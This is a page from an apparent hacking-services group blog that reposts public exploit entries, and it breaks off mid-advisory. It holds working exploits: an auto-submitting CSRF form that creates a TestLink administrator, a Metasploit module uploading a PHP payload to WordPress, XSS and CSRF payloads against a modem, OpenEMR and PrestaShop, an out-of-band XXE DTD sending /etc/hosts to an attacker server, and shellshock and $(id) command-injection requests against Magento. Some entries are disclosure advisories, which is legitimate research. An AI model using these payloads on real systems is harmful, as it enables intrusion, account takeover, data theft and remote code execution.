Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863144057

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=614

The following heap-based out-of-bounds memory read has been encountered in FreeType. It has been reproduced with the current version of freetype2 from master git branch, with a 64-bit build of the ftbench utility compiled with AddressSanitizer: 

$ ftbench <file> 

Attached are three POC files which trigger the conditions. 

--- 
$ freetype2-demos/bin/ftbench asan_heap-oob_783b6f_6837_eb01136f859a0091cb61f7beccd7059b 

ftbench results for font `asan_heap-oob_783b6f_6837_eb01136f859a0091cb61f7beccd7059b'
-------------------------------------------------------------------------------------

family: (null)
 style: (null)

number of seconds for each test: 2.000000

starting glyph index: 0
face size: 10ppem
font preloading into memory: no

load flags: 0x0
render mode: 0

CFF engine set to Adobe
TrueType engine set to version 35
maximum cache size: 1024KiByte

executing tests:
  Load                      =================================================================
==22366==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000eb55 at pc 0x00000069e2fc bp 0x7fffc4670610 sp 0x7fffc4670608
READ of size 1 at 0x60200000eb55 thread T0
    #0 0x69e2fb in tt_sbit_decoder_load_bit_aligned freetype2/src/sfnt/ttsbit.c:834:19
    #1 0x69d214 in tt_sbit_decoder_load_bitmap freetype2/src/sfnt/ttsbit.c:1145:15
    #2 0x69b1bf in tt_sbit_decoder_load_image freetype2/src/sfnt/ttsbit.c:1340:12
    #3 0x69eee2 in tt_sbit_decoder_load_compound freetype2/src/sfnt/ttsbit.c:932:15
    #4 0x69d214 in tt_sbit_decoder_load_bitmap freetype2/src/sfnt/ttsbit.c:1145:15
    #5 0x69b1bf in tt_sbit_decoder_load_image freetype2/src/sfnt/ttsbit.c:1340:12
    #6 0x6893d2 in tt_face_load_sbit_image freetype2/src/sfnt/ttsbit.c:1506:19
    #7 0x55d265 in load_sbit_image freetype2/src/truetype/ttgload.c:2127:13
    #8 0x55bedc in TT_Load_Glyph freetype2/src/truetype/ttgload.c:2487:15
    #9 0x5301a2 in tt_glyph_load freetype2/src/truetype/ttdriver.c:396:13
    #10 0x4f18ae in FT_Load_Glyph freetype2/src/base/ftobjs.c:742:15
    #11 0x4e966e in test_load freetype2-demos/src/ftbench.c:250:13
    #12 0x4e9c3f in benchmark freetype2-demos/src/ftbench.c:216:15
    #13 0x4e80e9 in main freetype2-demos/src/ftbench.c:1058:9

0x60200000eb55 is located 0 bytes to the right of 5-byte region [0x60200000eb50,0x60200000eb55)
allocated by thread T0 here:
    #0 0x4bc4a8 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
    #1 0x756740 in ft_alloc freetype2/src/base/ftsystem.c:74:12
    #2 0x51b4e7 in ft_mem_qalloc freetype2/src/base/ftutil.c:76:15
    #3 0x51abb1 in FT_Stream_EnterFrame freetype2/src/base/ftstream.c:269:12
    #4 0x51a800 in FT_Stream_ExtractFrame freetype2/src/base/ftstream.c:200:13
    #5 0x69ccab in tt_sbit_decoder_load_bitmap freetype2/src/sfnt/ttsbit.c:1036:10
    #6 0x69b1bf in tt_sbit_decoder_load_image freetype2/src/sfnt/ttsbit.c:1340:12
    #7 0x69eee2 in tt_sbit_decoder_load_compound freetype2/src/sfnt/ttsbit.c:932:15
    #8 0x69d214 in tt_sbit_decoder_load_bitmap freetype2/src/sfnt/ttsbit.c:1145:15
    #9 0x69b1bf in tt_sbit_decoder_load_image freetype2/src/sfnt/ttsbit.c:1340:12
    #10 0x6893d2 in tt_face_load_sbit_image freetype2/src/sfnt/ttsbit.c:1506:19
    #11 0x55d265 in load_sbit_image freetype2/src/truetype/ttgload.c:2127:13
    #12 0x55bedc in TT_Load_Glyph freetype2/src/truetype/ttgload.c:2487:15
    #13 0x5301a2 in tt_glyph_load freetype2/src/truetype/ttdriver.c:396:13
    #14 0x4f18ae in FT_Load_Glyph freetype2/src/base/ftobjs.c:742:15
    #15 0x4e966e in test_load freetype2-demos/src/ftbench.c:250:13
    #16 0x4e9c3f in benchmark freetype2-demos/src/ftbench.c:216:15
    #17 0x4e80e9 in main freetype2-demos/src/ftbench.c:1058:9

SUMMARY: AddressSanitizer: heap-buffer-overflow freetype2/src/sfnt/ttsbit.c:834:19 in tt_sbit_decoder_load_bit_aligned
Shadow bytes around the buggy address:
  0x0c047fff9d10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9d20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9d30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9d40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9d50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c047fff9d60: fa fa fa fa fa fa fa fa fa fa[05]fa fa fa fd fa
  0x0c047fff9d70: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
  0x0c047fff9d80: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
  0x0c047fff9d90: fa fa fd fa fa fa 04 fa fa fa 00 fa fa fa fd fa
  0x0c047fff9da0: fa fa fd fa fa fa fd fd fa fa fd fd fa fa fd fd
  0x0c047fff9db0: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==22366==ABORTING
---

The issue was reported in https://savannah.nongnu.org/bugs/?46379.

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38662.zip
HireHackking 
Information
=================================
Name: CSRF Vulnerability in TestLink 1.9.14
Affected Software: TestLink
Affected Versions: 1.9.14 and possibly below
Vendor Homepage: http://testlink.org/
Severity: High
Status: Fixed


Vulnerability Type:
=================================
Cross Site Request Forgery (CSRF)


CVE Reference:
=================================
Not assigned


Technical Details:
=================================
Even though the use of CSRF tokens are being implemented in the
application, they aren't properly
validated at the server side. This allows malicious requests to be
generated by the attacker and
get them processed by the server on behalf of the victim. By
exploiting the vulnerability,
the attacker will be able to create user accounts with administrator
privileges on the application.


Exploit Code
=================================

<html lang="en">
<head>
<title>CSRF Exploit to Create New Administrator Account</title>
</head>
<body>
<form action="http://localhost/testlink_1_9_14/lib/usermanagement/usersEdit.php"
id="formid" method="post">
<input type="hidden" name="CSRFName" value="" />
<input type="hidden" name="CSRFToken" value="" />
<input type="hidden" name="user_id" value="" />
<input type="hidden" name="user_login" value="" />
<input type="hidden" name="login" value="new_admin" />
<input type="hidden" name="firstName" value="new_administrator_fname" />
<input type="hidden" name="lastName" value="new_administrator_lname" />
<input type="hidden" name="password" value="new_administrator_password" />
<input type="hidden" name="emailAddress" value="new_administrator@admin.com" />
<input type="hidden" name="rights_id" value="8" />
<input type="hidden" name="locale" value="en_GB" />
<input type="hidden" name="authentication" value="" />
<input type="hidden" name="user_is_active" value="on" />
<input type="hidden" name="doAction" value="doCreate" />
<input type="hidden" name="do_update" value="Save" />
</form>
<script>
document.getElementById('formid').submit();
</script>
</body>
</html>


Exploitation Technique:
===================================
Remote


Severity Level:
===================================
High


Advisory Timeline
===================================
Sat, 7 Nov 2015 13:14:33 +0530 - First Contact
Sat, 7 Nov 2015 08:52:14 +0100 - Vendor Response
Sat, 7 Nov 2015 13:00:54 +0100 - Vendor Fixed
Sun, 8 Nov 2015 19:03:00 +0530 - Public Disclosure


Solution
====================================
This vulnerability is fixed in TestLink 1.9.15 (Tauriel)
Fix: https://github.com/TestLinkOpenSourceTRMS/testlink-code/commit/1cb1f78f1a50f6e6819bcbadeae345eb3213c487


Credits & Authors
====================================
Aravind C Ajayan, Balagopal N
HireHackking 
'''
********************************************************************************************
# Exploit Title: POP Peeper SEH Over-write.
# Date: 9/14/2015
# Exploit Author: Un_N0n
# Software Link: http://www.esumsoft.com/download
# Version: v4.0.1
# Tested on: Windows 7 x86(32 BIT)
********************************************************************************************
[DUMP:]
'''
EAX 00000000
ECX 20203029
EDX 77C5660D ntdll.77C5660D
EBX 00000000
ESP 0012EC5C
EBP 0012EC7C
ESI 00000000
EDI 00000000

EIP 20203029 

==============================
STACK:
0012FBF4   41414141
0012FBF8   41414141
0012FBFC   41414141
0012FC00   41414141
0012FC04   41414141 
0012FC08   909020EB  Pointer to next SE>
0012FC0C   20203029  SE handler
0012FC10   43434343
0012FC14   43434343
0012FC18   43434343
0012FC1C   43434343
0012FC20   43434343
0012FC24   43434343
0012FC28   43434343
===============================
'''

[Steps to Produce the Crash]:
1- Open 'POPPeeper.exe'
2- Goto Accounts->Add->CreateSingleAccount.
3- After entering the email address, the option for Account name will appear,
   enter the contents of crash.txt in it->Save.
4- Then compose a new mail->In TO field and Subject field, enter the contents of crash.txt
5- Save as Draft, software will crash.
6- Open up "POPPeeper.exe" again.
7- Click on Check Mail option, Software will crash.
Everytime you click on Check mail, it will crash as it will load the saved DRAFT.

[Code to produce CRASH.txt]
'''

buffer = "A"*66666
file = "crash.txt"
f = open(file,'w')
f.write(buffer)
f.close()

'''
[Extra Info:]
Offset : 2052
**********************************************************************************************
'''
HireHackking 
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HTTP::Wordpress
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Wordpress Ajax Load More PHP Upload Vulnerability',
      'Description'    => %q{
        This module exploits an arbitrary file upload in the WordPress Ajax Load More
        version 2.8.1.1. It allows to upload arbitrary php files and get remote code
        execution. This module has been tested successfully on WordPress Ajax Load More
        2.8.0 with Wordpress 4.1.3 on Ubuntu 12.04/14.04 Server.
      },
      'Author'         =>
        [
          'Unknown', # Identify yourself || send an PR here
          'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit Module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['WPVDB', '8209']
        ],
      'Privileged'     => false,
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [['Ajax Load More 2.8.1.1', {}]],
      'DisclosureDate' => 'Oct 10 2015',
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        OptString.new('WP_USERNAME', [true, 'A valid username', nil]),
        OptString.new('WP_PASSWORD', [true, 'Valid password for the provided username', nil])
      ], self.class
    )
  end

  def check
    check_plugin_version_from_readme('ajax-load-more', '2.8.1.2')
  end

  def username
    datastore['WP_USERNAME']
  end

  def password
    datastore['WP_PASSWORD']
  end

  def get_nonce(cookie)
    res = send_request_cgi(
      'method'    => 'GET',
      'uri'       => normalize_uri(wordpress_url_backend, 'admin.php'),
      'vars_get'  => {
        'page'    => 'ajax-load-more-repeaters'
      },
      'cookie'    => cookie
    )

    if res && res.body && res.body =~ /php","alm_admin_nonce":"([a-z0-9]+)"}/
      return Regexp.last_match[1]
    else
      return nil
    end
  end

  def exploit
    vprint_status("#{peer} - Trying to login as #{username}")
    cookie = wordpress_login(username, password)
    fail_with(Failure::NoAccess, "#{peer} - Unable to login as: #{username}") if cookie.nil?

    vprint_status("#{peer} - Trying to get nonce")
    nonce = get_nonce(cookie)
    fail_with(Failure::Unknown, "#{peer} - Unable to get nonce") if nonce.nil?

    vprint_status("#{peer} - Trying to upload payload")

    # This must be default.php
    filename = 'default.php'

    print_status("#{peer} - Uploading payload")
    res = send_request_cgi(
      'method'      => 'POST',
      'uri'         => normalize_uri(wordpress_url_backend, 'admin-ajax.php'),
      'vars_post'   => {
        'action'    => 'alm_save_repeater',
        'value'     => payload.encoded,
        'repeater'  => 'default',
        'type'      => 'default',
        'alias'     => '',
        'nonce'     => nonce
      },
      'cookie'      => cookie
    )

    if res
      if res.code == 200 && res.body.include?('Template Saved Successfully')
        register_files_for_cleanup(filename)
      else
        fail_with(Failure::Unknown, "#{peer} - You do not have sufficient permissions to access this page.")
      end
    else
      fail_with(Failure::Unknown, 'Server did not respond in an expected way')
    end

    print_status("#{peer} - Calling uploaded file")
    send_request_cgi(
      'uri'    => normalize_uri(wordpress_url_plugins, 'ajax-load-more', 'core', 'repeater', filename)
    )
  end
end
HireHackking 
<!--
# Exploit Title: Unauthenticated Stored Xss
# Date: 11/6/15
# Exploit Author: Nu11By73
# Vendor Homepage: comcast.net and arrisi.com
# Version:  eMTA & DOCSIS Software Version: 10.0.59.SIP.PC20.CT
Software Image Name:TG1682_2.0s7_PRODse
Advanced Services:TG1682G
Packet Cable:2.0
# Tested on: Default Install
-->

<html>
<p>Unauth Stored CSRF/XSS - Xfinity Modem</p>
<form method="POST" action="http://192.168.0.1/actionHandler/ajax_managed_services.php">
<input type="hidden" name="set" value="true" />
<input type="hidden" name="UMSStatus" value="Enabled" />
<input type="hidden" name="add" value="true" />
<input type="hidden" name="service" value="test><script>alert(1)</script>" / >
<input type="hidden" name="protocol" value="TCP" / >
<input type="hidden" name="startPort" value="1" />
<input type="hidden" name="endPort" value="2" />
<input type="hidden" name="block" value="true" />
<input type="submit" title="Enable Service" />
</form>
</html>
HireHackking 
source: https://www.securityfocus.com/bid/61158/info

PrestaShop is prone to multiple cross-site request-forgery vulnerabilities.

Exploiting these issues may allow a remote attacker to perform certain unauthorized actions in the context of the affected application. Other attacks are also possible.

PrestaShop 1.5.4 is vulnerable; other versions may also be affected. 

<html>
<head>
<body>
<img src="http://www.example.com/language/cart?add=&id_product=[Product ID]" width=0 height=0>
</body>
</head>
</html>
HireHackking 
source: https://www.securityfocus.com/bid/61156/info

Corda .NET Redirector is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

Corda .NET Redirector 7.3.11.6715 is vulnerable; other versions may also be affected. 

http://www.example.com/Corda/redirector.corda/? () _FILEhttp://<URL>/?<script>alert('Text')</script><iframe src=http://www.example1.com></iframe>@_TEXTDESCRIPTIONEN
HireHackking 
# Date: 06.11.2015
# Exploit Author: Dawid Golunski
# Vendor Homepage: https://developers.google.com/adwords/api/docs/clientlibraries
# Software Link: https://github.com/googleads/googleads-php-lib
# Version: Google AdWords API client libraries - XML eXternal Entity Injection (XXE)


=============================================
- Release date: 06.11.2015
- Discovered by: Dawid Golunski
- Severity: Medium/High
=============================================

 
I. VULNERABILITY
-------------------------

Google AdWords API client libraries   -    XML eXternal Entity Injection (XXE)

Confirmed in googleads-php-lib <= 6.2.0 for PHP, AdWords libraries: 
googleads-java-lib for Java, and googleads-dotnet-lib for .NET are also likely
to be affected.

 
II. BACKGROUND
-------------------------

- AdWords API

"The AdWords API is a collection of web services that you can use to build 
applications that manage AdWords accounts and their associated campaign data.
While the AdWords API is based on SOAP 1.1, high-level client libraries are 
provided to help you develop applications more quickly."

AdWords API client libraries are available for different platforms
such as PHP, .NET, Java etc. 

These can be found at:

https://developers.google.com/adwords/api/docs/clientlibraries
 
III. INTRODUCTION
-------------------------

As Google AdWords is based on SOAP protocol that uses XML to transfer the data,
client API libraries should have necessary preventions against XML eXternal 
Entity injection attacks. However, an independent research found the necessary
preventions to be lacking in several Google AdWords API client libraries,
which could allow XXE attacks on applications/servers that make use of them.

XXE (XML eXternal Entity) attack is an attack on an application that parses XML 
input from untrusted sources using incorrectly configured XML parser. 
The application may be forced to open arbitrary files and/or network resources.
Exploiting XXE issues on PHP applications may also lead to denial of service or
in some cases (when an 'expect' PHP module is installed) lead to command 
execution.

IV. DESCRIPTION
-------------------------
 
This advisory will focus on PHP version of the AdWords API client library.
Other versions of the client library such as .NET and Java seem to be 
vulnerable in a similar way.

googleads-php-lib contains the following function which queries WSDL from the 
remote google adwords server:

---[ build_lib/WSDLInterpreter/WSDLInterpreter.php ]---

  protected function loadWsdl($wsdlUri, $proxy = null) {
    // Set proxy.
    if ($proxy) {
      $opts = array(
          'http' => array(
              'proxy' => $proxy,
              'request_fulluri' => true
          )
      );
      $context = stream_context_get_default($opts);
      libxml_set_streams_context($context);
    }

    $this->dom = new DOMDocument();
    $this->dom->load($wsdlUri,
        LIBXML_DTDLOAD|LIBXML_DTDATTR|LIBXML_NOENT|LIBXML_XINCLUDE);

    $this->serviceNamespace =
        $this->dom->documentElement->getAttribute('targetNamespace');
  }

-------------------------------------------------------

The function connects to the API endpoint to get the WSDL document describing
the functionality of the AdWords web service in XML.

For security reasons Google AdWords API can only be accessed via HTTPS. 
However, the above code does not set appropriate SSL settings on the 
https:// stream context. It fails to assign Certificate Authority (CA),
and turn the verify_peer option to ON.
It uses the stream_context_get_default() to get the default context,
which on all PHP versions below PHP 5.6.x (see references below) does not 
validate the CA by default. 

Because of this, applications using the AdWords API library may be tricked into 
retrieving data from untrusted sources pretending to be adwords.google.com.

The above code does not provide any XXE injection attack prevention.
It does not disable external entity processing. To make it worse,
it specifically enables it via the LIBXML parameters provided to the 
dom->load() function so an XXE injection attack would work even on
systems that have the newest and fully patched version of libxml library 
which does not process the entities by default.

Another vulnerable part of the application is located in the code:

---[ src/Google/Api/Ads/Common/Util/XmlUtils.php ]---

  public static function GetDomFromXml($xml) {
    set_error_handler(array('XmlUtils', 'HandleXmlError'));
    $dom = new DOMDocument();
    $dom->loadXML($xml,
        LIBXML_DTDLOAD | LIBXML_DTDATTR | LIBXML_NOENT | LIBXML_XINCLUDE);
    restore_error_handler();
    return $dom;
  }

-----------------------------------------------------

which is used by the AdsSoapClient class to process SOAP requests. It
also activates the ENTITY processing even if libxml parser is set to
ingore them by default. AdsSoapClient can be configured to verify SSL peer
in SSL communication via the settings INI file but this option is set to 
off by default.

These SSL settings, and the XML ENTITY processing combined make applications 
using the AdWords API vulnerable to XXE injection attacks. 

For the attack to be successful, an attacker needs to
perform a MitM attack to impersonate adwords.google.com server (eg. via DNS 
poisoning/spoofing/proxy attacks, ARP spoofing, etc.) to inject malicious 
XML input.

 
V. PROOF OF CONCEPT
-------------------------
 
Below is a test application that makes use of the PHP Google AdWords API 
library.

The application simply connects to the AdWords API endpoint to retrieve the 
WSDL document.

---[ testAPI.php ]---

<?php
// Test application reading WSDL from Google AdWords 

set_include_path('./build_lib/WSDLInterpreter/');
require_once 'WSDLInterpreter.php';

$wsdlUri = 'https://adwords.google.com/api/adwords/cm/v201502/'
	  .'CampaignService?wsdl';

$wsdlInterpreter = new WSDLInterpreter($wsdlUri, "AdWordsSoapClient",null, 
null, "CampaignService", "v201502", "Ads_Google", 
"./src/Google/Api/Ads/AdWords/Lib/AdWordsSoapClient.php", null, true, null);

?>

---------------------


To exploit this application, an attacker needs to perform a MitM attack to 
impersonate adwords.google.com server, as mentioned in the introduction.
For simplicity, we can add the following entry to /etc/hosts on the victim's
server:

192.168.57.12   adwords.google.com

to simulate a successful MitM attack where attacker successfully manages
to ,for example, poison the DNS cache to point the adwords subdomain at his
malicious web server (192.168.57.12).

The attacker then needs to create a malicious XML file on his server to 
return it to the victim. Example payload could look as follows:

$ curl --insecure 'https://192.168.57.12/api/adwords/cm/v201502/CampaignService?wsdl'

<?xml version="1.0"?>
<!DOCTYPE root
[
<!ENTITY xxetest SYSTEM "http://192.168.57.12/adwords_xxe_hack.dtd">
]>
<test><testing>&xxetest;</testing></test>


The XML payload returned by the attacker will cause the vulnerable
AdWords API library to resolve the 'xxetest' entity and connect
back to the attacker's server to retrieve adwords_xxe_hack.dtd.


This can be verified on the victim's server by executing the demonstrated
testAPI.php script:

$ curl http://victims_server/googleads-php-lib-master/testAPI.php


The script will try to retrieve the WSDL/XML document from adwords.google.com
which will provide the above malicious XML. 
After the injected entity is read, the attacker will get a connection from the 
victim:

attacker@mitm# nc -vv -l 8080
Connection from victims_server port 8080 [tcp/http-alt] accepted
GET /adwords_xxe_hack.dtd HTTP/1.0
Host: 192.168.57.12:8080


At this point attacker could add other entities to carry out an Out of band
XXE attack to read system files (such as /etc/passwd) located on the victim's 
server, or execute commands via expect:// PHP wrapper if the 'expect' module
is enabled.


For example, this payload:

<?xml version="1.0"?>
<!DOCTYPE test [ 
 <!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/hosts">
 <!ENTITY % dtd SYSTEM "http://192.168.57.12/send.dtd">
%dtd;
]>
<test><testing>test &send;</testing></test>

with another file located on the attacker's file server:

---[ send.dtd ]---

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://192.168.57.12:8080/retrieved/%file;'>">
%all;

------------------

would send the contents of the /etc/hosts file to the attacker.


VI. BUSINESS IMPACT
-------------------------

The severity of this issue is lowered to medium/high despite as the XXE 
injection vulnerability in the code, the attacker must impersonate 
adwords.google.com server to be able to inject malicious XML. 
If there is a possibility for such an attack, the severity of the issue can
grow to high/critical due to the exploitation possibilities through XXE
injection.
 
VII. SYSTEMS AFFECTED
-------------------------

The latest version of Google AdWords API PHP client library was confirmed to 
be vulnerable. The client libraries for other platforms seem to lack necessary 
XXE attack preventions too. 
For example, the Java version, did not set the 
'sax/features/external-general-entities' setting to off when creating an 
instance of the DocumentBuilderFactory class. And the .NET version of the 
AdWords API was missing explicit 'ProhibitDtd' setting on the XMLReader.

Vulnerabilities were found in googleads-php-lib in versions below 5.9.0 and 
reported to Google in May 2015, they were just fixed in AdWords php library ver. 
6.3.0.
 
VIII. SOLUTION
-------------------------

Install the latest version of the Google AdWords API library available for your
platform, and tighten SSL settings by enabling SSL CA verification in the
library settings file.
 
IX. REFERENCES
-------------------------

http://legalhackers.com/advisories/Google-AdWords-API-libraries-XXE-Injection-Vulnerability.txt

https://developers.google.com/adwords/api/docs/clientlibraries

https://github.com/googleads/googleads-php-lib

https://developers.google.com/adwords/api/docs/

PHP 5.6.x openssl certificates in PHP streams:
http://php.net/manual/en/migration56.openssl.php

http://legalhackers.com

X. CREDITS
-------------------------

The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com

http://legalhackers.com
 
XI. TIMELINE
-------------------------

May 18th, 2015:  Advisory created and sent to Google Security Team

Nov 5th,  2015:  Google, after half a year, confirm the vulnerability has been patched

Nov 6th,  2015:  Advisory released publicly
 
XII. LEGAL NOTICES
-------------------------

The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.
HireHackking 
source: https://www.securityfocus.com/bid/61154/info

OpenEMR is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.

Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.

OpenEMR 4.1.1 patch-12 and prior are vulnerable. 

1. Misc > Office Notes ('note' parameter is vulnerable with a POST to 
/openemr-4.1.1/interface/main/onotes/office_comments_full.php)

#Request:

POST http://www.example.com/openemr-4.1.1/interface/main/onotes/office_comments_full.php HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Proxy-Connection: keep-alive
Referer: http://www.example.com/openemr-4.1.1/interface/main/onotes/office_comments_full.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43

mode=new&offset=0&active=all&note=<script>alert(document.cookie)</script>

#Response:

<snip>
<tr><td><input type=hidden value='' name='act115' id='act115'><input name='box115' id='box115' 
onClick='javascript:document.update_activity.act115.value=this.checked' type=checkbox checked></td><td><label 
for='box115' class='bold'>Wed February 06th</label> <label for='box115' class='bold'>(test)</label></td><td><label 
for='box115' class='text'><script>alert(document.cookie)</script>&nbsp;</label></td></tr>
<snip>
HireHackking 
source: https://www.securityfocus.com/bid/61152/info

Corda Highwire is prone to a path disclosure vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this issue to obtain sensitive information that may lead to further attacks. 

http://www.example.com/highwire.ashx?url=../../
HireHackking 
# Exploit Title: eBay Magento CE <= 1.9.2.1 Unrestricted Cron Script (Potential Code Execution / DoS)
# Date: 06.11.2015
# Exploit Author: Dawid Golunski
# Vendor Homepage: http://magento.com
# Version: eBay Magento CE <= 1.9.2.1 / Magento EE <=1.14.2.1
# Tested on: Linux
# Magento reference ID: APPSEC-1045



=============================================
- Release date: 06.11.2015
- Discovered by: Dawid Golunski
- Severity: Medium
- eBay Magento ref.: APPSEC-1037
=============================================

 
I. VULNERABILITY
-------------------------

eBay Magento CE <= 1.9.2.1      Unrestricted Cron Script (Potential Code Execution / DoS)
eBay Magento EE <= 1.14.2.1

 
II. BACKGROUND
-------------------------

- eBay Magento eCommerce

http://magento.com/

"More than 240,000 merchants worldwide put their trust in our eCommerce 
software. Magento's eCommerce platform gives you the tools you need to attract 
more prospects, sell more products, and make more money. It's what we do.

We're owned by eBay, so you know we're eCommerce experts"

 
III. INTRODUCTION
-------------------------

Default installation of ebay Magento eCommerce software comes with a cron.php 
which allows to manage scheduled tasks. The script is not protected by default 
and can be publicly accessed.

The publicly exposed cron script poses some potential risks such as exploitation 
of the well known shellshock vulnerability on unpatched systems leading to code 
execution. 
The same script has another potential command execution vector that stems from 
inproper data sanitisation passed to a shell_exec function.

Apart from the code execution vectors, the script could potentially be used to
perform a DoS attack due to lack of locking mechanism that prevents the script
from spawning multiple instances of other helper shell scripts.


IV. DESCRIPTION
-------------------------
 
A) Shellshock vector

Magento cron.php script includes a command execution function that looks as
follows:

-----[ magento/cron.php ]-----

...

try {
    if (stripos(PHP_OS, 'win') === false) {
        $options = getopt('m::');
        if (isset($options['m'])) {
            if ($options['m'] == 'always') {
                $cronMode = 'always';
            } elseif ($options['m'] == 'default') {
                $cronMode = 'default';
            } else {
                Mage::throwException('Unrecognized cron mode was defined');
            }

        } else if (!$isShellDisabled) {
            $fileName = basename(__FILE__);
            $baseDir = dirname(__FILE__);
            shell_exec("/bin/sh $baseDir/cron.sh $fileName -mdefault 1 > /dev/null 2>&1 &");
            shell_exec("/bin/sh $baseDir/cron.sh $fileName -malways 1 > /dev/null 2>&1 &");
            exit;
        }
...

------------------------------
    

As can be seen, the script runs shell_exec() that loads /bin/sh program which
is usually a symlink to /bin/bash.
Although the shellshock vulnerability should be patched, there have been reports 
of linux distributions that insufficiently patched the issue and remained
vulnerable. 
Magento's cron.php could be used as exploit the shellshock vulnerability on 
unpatched systems which host Magento in CGI mode (which can be easily enabled 
via .htaccess file provided with Magento).

B) Command injection

The script fails to sanitise the input data coming from $baseDir variable. 
Input passed to shell execution functions should always be sanitised with 
escapeshellcmd / escapeshellarg PHP functions. 

Although not exploitable on its own, the lack of escaping could allow to inject 
some system commands on Magento hosting platforms which have a feature to 
create backups of directories with a specified name within the document root.

If the provided hosting control panel allows to specify names of such backups,
a user could potentially inject some malicious data within the directory name 
which could result in a command injection when cron.php is run from the backup 
directory.
The command would execute upon the shell_exec() receiving the malicious data 
injected with the help of the $baseDir variable.

C) Denial of Service

As the script lacks any access control and a locking mechanism, it is possible 
to remotely request cron.php multiple times in order to make it spawn 
multiple instances of the cron.sh script. 
As a single execution of the script results in 2 cron.sh spawned processes, plus
a separate CGI process (if website runs as CGI), an attacker could potentially
overload the Magento site with multiple requests and create a Denial of Service 
condition by process exhaustion etc.

 
V. PROOF OF CONCEPT
-------------------------
 
A) Shellshock vector exploit

Sending the following request to a CGI-enabled Magento site:

GET /magento/cron.php HTTP/1.1
Host: victim_magento_site
User-Agent: () { :; } ; /bin/touch /tmp/magento_cron_hack

will result in a command execution on shellshock affected systems.
The resul of the above would be:

victim$ ls -l /tmp/magento_cron_hack 
-rw-rw-rw- 1 www-data www-data 0 Jul 26 09:08 /tmp/magento_cron_hack



B) Command injection

Due to lack of sanitisation, if a malicious Magento user had access
to a backup facility, he could potenially create a backup of the magento 
directory with a command within the name , e.g.: 

$(id)

The user could then request the cron.php script via the following request:

GET /magento/$(id)/cron.php HTTP/1.1
Host: victim_magento_site

Because of the shell_exec() function in the quoted sourcecode of cron.php:

---
    $baseDir = dirname(__FILE__);
    shell_exec("/bin/sh $baseDir/cron.sh $fileName -mdefault 1 > /dev/null 2>&1 &");
---

it would cause the cron.php script to run the following command:

/bin/sh /var/www/magento/$(id)/cron.sh exec.php -mdefault 1 > /dev/null 2>&1 &

The command would run id program as soon as bash command expansion syntax of 
$() got evaluated.


An attacker could also run more complex commands, by hex encoding disallowed
characters within directory names (such as '/' directory separator).

For example, he could run the command: 

touch /tmp/magento_exec


by encoding it as follows:

echo 'touch /tmp/magento_exec' | hexdump -v -e '"\\\\\\""x" 1/1 "%02x" ""' ${1}

\\\x74\\\x6f\\\x75\\\x63\\\x68\\\x20\\\x2f\\\x74\\\x6d\\\x70\\\x2f\\\x6d\\\x61\\\x67\\\x65\\\x6e\\\x74\\\x6f\\\x5f\\\x65\\\x78\\\x65\\\x63

He could then execute it via a GET request of:

